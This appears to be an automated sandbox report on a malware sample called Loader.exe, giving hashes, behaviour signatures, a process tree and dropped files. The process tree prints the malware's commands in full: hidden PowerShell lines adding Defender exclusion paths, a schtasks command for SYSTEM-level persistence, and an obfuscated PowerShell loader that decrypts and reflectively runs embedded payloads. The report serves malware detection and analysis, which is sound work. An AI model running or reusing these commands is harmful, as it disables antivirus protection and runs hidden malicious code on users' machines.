Analysis
-
max time kernel
119s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
04-04-2024 12:27
Static task
static1
Behavioral task
behavioral1
Sample
Loader.exe
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
Loader.exe
Resource
win10v2004-20240226-en
Behavioral task
behavioral3
Sample
opengl32.dll
Resource
win7-20240221-en
Behavioral task
behavioral4
Sample
opengl32.dll
Resource
win10v2004-20240226-en
General
-
Target
Loader.exe
-
Size
69.9MB
-
MD5
0e3f59387c131274d399813d1d95d80c
-
SHA1
f09cce4678a762cfe87dbc5c8b68f9a951afebb2
-
SHA256
558be4bca2165d9e1335330cfacc0ff3c175ed21dfe17c7421b3b1bae6348a6a
-
SHA512
fc04a75b47d0780212971e7a1db91df5f4d98ed796379bea053fb2c2578b3de42a6da561ce1579479f6f5088a06ff32d6945ac5fe112a5ca236f5453c60e54e1
-
SSDEEP
393216:S0tsUElbLI3r6B6Xlek/Kez3sFumIYUDfLFokwsWtjGHx:SEIHIjlek/KY4bIYU7/wsfx
Malware Config
Signatures
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
Processes:
driver1.exepid process 696 driver1.exe 1208 -
Loads dropped DLL 2 IoCs
Processes:
Loader.exepid process 1932 Loader.exe 1208 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
GoLang User-Agent 3 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 2 Go-http-client/1.1 HTTP User-Agent header 3 Go-http-client/1.1 HTTP User-Agent header 4 Go-http-client/1.1 -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1708 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 2700 powershell.exe 2528 powershell.exe 1708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 43 IoCs
Processes:
WMIC.exepowershell.exepowershell.exepowershell.exedescription pid process Token: SeIncreaseQuotaPrivilege 1940 WMIC.exe Token: SeSecurityPrivilege 1940 WMIC.exe Token: SeTakeOwnershipPrivilege 1940 WMIC.exe Token: SeLoadDriverPrivilege 1940 WMIC.exe Token: SeSystemProfilePrivilege 1940 WMIC.exe Token: SeSystemtimePrivilege 1940 WMIC.exe Token: SeProfSingleProcessPrivilege 1940 WMIC.exe Token: SeIncBasePriorityPrivilege 1940 WMIC.exe Token: SeCreatePagefilePrivilege 1940 WMIC.exe Token: SeBackupPrivilege 1940 WMIC.exe Token: SeRestorePrivilege 1940 WMIC.exe Token: SeShutdownPrivilege 1940 WMIC.exe Token: SeDebugPrivilege 1940 WMIC.exe Token: SeSystemEnvironmentPrivilege 1940 WMIC.exe Token: SeRemoteShutdownPrivilege 1940 WMIC.exe Token: SeUndockPrivilege 1940 WMIC.exe Token: SeManageVolumePrivilege 1940 WMIC.exe Token: 33 1940 WMIC.exe Token: 34 1940 WMIC.exe Token: 35 1940 WMIC.exe Token: SeIncreaseQuotaPrivilege 1940 WMIC.exe Token: SeSecurityPrivilege 1940 WMIC.exe Token: SeTakeOwnershipPrivilege 1940 WMIC.exe Token: SeLoadDriverPrivilege 1940 WMIC.exe Token: SeSystemProfilePrivilege 1940 WMIC.exe Token: SeSystemtimePrivilege 1940 WMIC.exe Token: SeProfSingleProcessPrivilege 1940 WMIC.exe Token: SeIncBasePriorityPrivilege 1940 WMIC.exe Token: SeCreatePagefilePrivilege 1940 WMIC.exe Token: SeBackupPrivilege 1940 WMIC.exe Token: SeRestorePrivilege 1940 WMIC.exe Token: SeShutdownPrivilege 1940 WMIC.exe Token: SeDebugPrivilege 1940 WMIC.exe Token: SeSystemEnvironmentPrivilege 1940 WMIC.exe Token: SeRemoteShutdownPrivilege 1940 WMIC.exe Token: SeUndockPrivilege 1940 WMIC.exe Token: SeManageVolumePrivilege 1940 WMIC.exe Token: 33 1940 WMIC.exe Token: 34 1940 WMIC.exe Token: 35 1940 WMIC.exe Token: SeDebugPrivilege 2700 powershell.exe Token: SeDebugPrivilege 2528 powershell.exe Token: SeDebugPrivilege 1708 powershell.exe -
Suspicious use of WriteProcessMemory 31 IoCs
Processes:
Loader.execmd.execmd.execmd.exedescription pid process target process PID 1932 wrote to memory of 2732 1932 Loader.exe cmd.exe PID 1932 wrote to memory of 2732 1932 Loader.exe cmd.exe PID 1932 wrote to memory of 2732 1932 Loader.exe cmd.exe PID 2732 wrote to memory of 1940 2732 cmd.exe WMIC.exe PID 2732 wrote to memory of 1940 2732 cmd.exe WMIC.exe PID 2732 wrote to memory of 1940 2732 cmd.exe WMIC.exe PID 1932 wrote to memory of 2700 1932 Loader.exe powershell.exe PID 1932 wrote to memory of 2700 1932 Loader.exe powershell.exe PID 1932 wrote to memory of 2700 1932 Loader.exe powershell.exe PID 1932 wrote to memory of 2528 1932 Loader.exe powershell.exe PID 1932 wrote to memory of 2528 1932 Loader.exe powershell.exe PID 1932 wrote to memory of 2528 1932 Loader.exe powershell.exe PID 1932 wrote to memory of 696 1932 Loader.exe driver1.exe PID 1932 wrote to memory of 696 1932 Loader.exe driver1.exe PID 1932 wrote to memory of 696 1932 Loader.exe driver1.exe PID 1932 wrote to memory of 2836 1932 Loader.exe cmd.exe PID 1932 wrote to memory of 2836 1932 Loader.exe cmd.exe PID 1932 wrote to memory of 2836 1932 Loader.exe cmd.exe PID 2836 wrote to memory of 1768 2836 cmd.exe cmd.exe PID 2836 wrote to memory of 1768 2836 cmd.exe cmd.exe PID 2836 wrote to memory of 1768 2836 cmd.exe cmd.exe PID 1768 wrote to memory of 1904 1768 cmd.exe cmd.exe PID 1768 wrote to memory of 1904 1768 cmd.exe cmd.exe PID 1768 wrote to memory of 1904 1768 cmd.exe cmd.exe PID 1768 wrote to memory of 1708 1768 cmd.exe powershell.exe PID 1768 wrote to memory of 1708 1768 cmd.exe powershell.exe PID 1768 wrote to memory of 1708 1768 cmd.exe powershell.exe PID 1768 wrote to memory of 1708 1768 cmd.exe powershell.exe PID 1932 wrote to memory of 1028 1932 Loader.exe schtasks.exe PID 1932 wrote to memory of 1028 1932 Loader.exe schtasks.exe PID 1932 wrote to memory of 1028 1932 Loader.exe schtasks.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\Loader.exe"C:\Users\Admin\AppData\Local\Temp\Loader.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1932 -
C:\Windows\system32\cmd.execmd /C "wmic path win32_VideoController get name"2⤵
- Suspicious use of WriteProcessMemory
PID:2732 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name3⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:1940
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\Users\Admin\AppData\Roaming\""2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle hidden -Command "Add-MpPreference -ExclusionPath \"C:\ProgramData\""2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2528
-
-
C:\ProgramData\driver1.exeC:\ProgramData\driver1.exe2⤵
- Executes dropped EXE
PID:696
-
-
C:\Windows\system32\cmd.execmd /c C:\ProgramData\driver2.cmd2⤵
- Suspicious use of WriteProcessMemory
PID:2836 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /K C:\ProgramData\driver2.cmd3⤵
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\ProgramData\driver2.cmd';$AqEi='CrsqtpesqtpatsqtpeDesqtpcrsqtpyptsqtposqtprsqtp'.Replace('sqtp', ''),'FrCJbRoCJbRmBaCJbRseCJbR64CJbRStCJbRriCJbRnCJbRgCJbR'.Replace('CJbR', ''),'InTTXMvokTTXMeTTXM'.Replace('TTXM', ''),'EnfaNStryfaNSPoifaNSnfaNStfaNS'.Replace('faNS', ''),'ChMkDfanMkDfgeMkDfExtMkDfensMkDfioMkDfnMkDf'.Replace('MkDf', ''),'LonQgGanQgGdnQgG'.Replace('nQgG', ''),'MbgpxaibgpxnMbgpxobgpxdulbgpxebgpx'.Replace('bgpx', ''),'REtcKeEtcKadLEtcKinEtcKesEtcK'.Replace('EtcK', ''),'ElzFDsemzFDsezFDsnzFDstAzFDstzFDs'.Replace('zFDs', ''),'CenWEopenWEyenWEToenWE'.Replace('enWE', ''),'GeEAEWtCuEAEWrrEAEWenEAEWtPEAEWroEAEWcEAEWeEAEWsEAEWsEAEW'.Replace('EAEW', ''),'SpOMiiliOMiitOMii'.Replace('OMii', ''),'TrNYnSanNYnSsNYnSfNYnSorNYnSmNYnSFNYnSinaNYnSlBlNYnSocNYnSkNYnS'.Replace('NYnS', ''),'DecKPNcocKPNmpcKPNrcKPNesscKPN'.Replace('cKPN', '');powershell -w hidden;function CpemN($DYVvD){$uCDxz=[System.Security.Cryptography.Aes]::Create();$uCDxz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$uCDxz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$uCDxz.Key=[System.Convert]::($AqEi[1])('hwWmx8yZnmhBXTUujLmUilT/inW7ASWUfza/yiGaTE0=');$uCDxz.IV=[System.Convert]::($AqEi[1])('1shh+Csacdi2MAxWoHL6Vw==');$WrKXJ=$uCDxz.($AqEi[0])();$lQEbS=$WrKXJ.($AqEi[12])($DYVvD,0,$DYVvD.Length);$WrKXJ.Dispose();$uCDxz.Dispose();$lQEbS;}function Vaeom($DYVvD){$ufaBC=New-Object System.IO.MemoryStream(,$DYVvD);$fvcwX=New-Object System.IO.MemoryStream;$KxhFO=New-Object System.IO.Compression.GZipStream($ufaBC,[IO.Compression.CompressionMode]::($AqEi[13]));$KxhFO.($AqEi[9])($fvcwX);$KxhFO.Dispose();$ufaBC.Dispose();$fvcwX.Dispose();$fvcwX.ToArray();}$oYEdq=[System.IO.File]::($AqEi[7])([Console]::Title);$sExPv=Vaeom (CpemN ([Convert]::($AqEi[1])([System.Linq.Enumerable]::($AqEi[8])($oYEdq, 5).Substring(2))));$uYvCe=Vaeom (CpemN ([Convert]::($AqEi[1])([System.Linq.Enumerable]::($AqEi[8])($oYEdq, 6).Substring(2))));[System.Reflection.Assembly]::($AqEi[5])([byte[]]$uYvCe).($AqEi[3]).($AqEi[2])($null,$null);[System.Reflection.Assembly]::($AqEi[5])([byte[]]$sExPv).($AqEi[3]).($AqEi[2])($null,$null); "4⤵PID:1904
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe4⤵
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1708
-
-
-
-
C:\Windows\system32\schtasks.exeschtasks /create /tn WinDriver /tr C:\ProgramData\Microsoft\WinDriver.cmd /sc onstart /ru SYSTEM2⤵
- Creates scheduled task(s)
PID:1028
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
7.2MB
MD5d14ef6e6b689c92514b92b7865f622c6
SHA103a0aaafd831d9c07784744e0358b83e506402ab
SHA2562d68dffce5555c659fb1de2b4d1e28597667ddefd6c99844ee5a346adcf0d036
SHA51287754c793b4abc0066588cf60cff7b763090e2680aa3bc889e9f36ecaee28f18ea0ab1bb37d7049781079197237d83bb0995b61caa87888df4556ae921973d0c
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize7KB
MD564a7059321c6889d4162230fc7417dee
SHA155ec49e0949eeee3e2f6ea055abcfd98cb460cae
SHA2567ae8a07ee9681fa55c972c2bd9bdb7a4e488872ca46dbf9675e3b8a06336c583
SHA512fb8261312071b2c292bbb4ee97a8f86326997014071b5ab178e468221e4697e8b4e248e3735a617310db4964a37129cce298738f0b4f078deebffbd88e3c2cc7
-
Filesize
3.6MB
MD5eb93f3965887e8796917d34d40c0869d
SHA110976e4bc2a7d412550048c06def0b0ebba77eb6
SHA25631d452a1ae5637cd3127e7a2e4e8de9771ea1d4e2fa34cddfdd9f90b73d098a5
SHA512b743c9ef3fe72f7e79c16929ee6d00cd4a0961309ea73f12b599bf5217b271bef61ac1981fed8a2b48187c5ad8ca18d572d7076d335f0440c52f77f47cd81281